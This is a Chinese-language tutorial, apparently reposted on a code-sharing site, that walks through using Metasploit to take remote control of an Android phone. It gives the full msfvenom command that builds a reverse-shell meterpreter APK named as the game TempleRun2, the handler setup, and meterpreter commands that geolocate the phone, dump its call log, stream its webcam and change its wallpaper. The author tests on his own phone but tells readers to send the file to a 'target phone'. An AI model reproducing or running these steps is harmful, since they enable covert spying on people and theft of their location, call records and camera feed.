使用Metasploit實現對Android的遠程管理


話不多說,我們直接切入正題。

1.首先我們打開Kali的命令終端,輸入如下命令:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444

>/root/Desktop/TempleRun2.apk

我們可以看到在桌面生成了一個.APK的文件。

2016041206541299

2.將生成的APK文件發送給目標手機。在此以我自己的手機為例,我將文件下載並安裝到了自己手機上。下面我們在Kali上建立一個監聽和處理反彈shell的程序。首先輸入:msfconsole 啟動MSF。以下依次輸入如下命令:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.0.102

set lport 4444

exploit

2016041206595742

到這步我已經成功取得了我的Android手機的控制權。讓我們在Kali上執行一些命令看看是否有效。我們查看下該手機是否已經取得root 權限。輸入命令:

check_root

2016041207023174

查下手機目前所處的大概位置:

wlan_geolocate

2016041207042683

通過以上結果提供的URL,我們可以使用谷歌地圖進行定位。將URL復制到瀏覽器打開。

2016041207061420

下載目標手機上的通話記錄:

dump_calllog

2016041207075912

默認保存在了 /root/calllog_dump.txt 

2016041207090425

打開攝像頭實時畫面:

webcam_stream

2016041207113521

在瀏覽器查看。

2016041207124998

來個比較有意思的。現在讓我遠程強制修改我手機的壁圖案。繼續輸入命令如下:

msf > use post/multi/manage/set_wallpaper

msf post (set_wallpaper)>set WALLPAPER_FILE  /root/Desktop/hack.jpg

msf post (set_wallpaper)>set session 1

msf post (set_wallpaper)>exploit

2016041207200477

成功替換!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM